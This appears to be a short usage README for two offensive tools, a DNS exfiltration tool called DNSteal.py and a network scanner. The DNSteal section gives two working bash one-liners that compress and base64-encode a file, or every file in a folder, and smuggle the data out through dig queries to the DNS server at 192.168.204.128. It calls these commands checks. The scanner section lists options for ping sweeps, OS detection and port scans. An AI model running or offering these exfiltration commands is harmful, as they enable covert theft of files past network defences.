(For DNSteal.py)
1) Command to check specific file
f=file.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.204.128 `echo -ne $r$f|tr "+" "*"` +short; done


2) Command to check specific folder
for f in $(ls .); do s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.204.128 `echo -ne $r$f|tr "+" "*"` +short; done ; done

dnsteal will generate into an csv file.

-------------------------------------------------------------------------------------------------------------------------------------------------------
(For Network_Scan.py)

1) To ask for help
python network_scan.py -h

2) To get OS information
python network_scan.py -m os

3) To icmp scan 1 IP Address
python network_scan.py -m p –ip [IP Address]

4) To icmp scan a number of IP Addresses (Example: 10) If not specified, will go to /24 IP Addresses.
python network_scan.py -m p –n [IP Address] -l 10

5) To do port scan. (Example: 1024 ports) If not specified, will go to total of 65535 ports.
python network_scan.py -m ps –ip [IP Address] -l 1024 -f

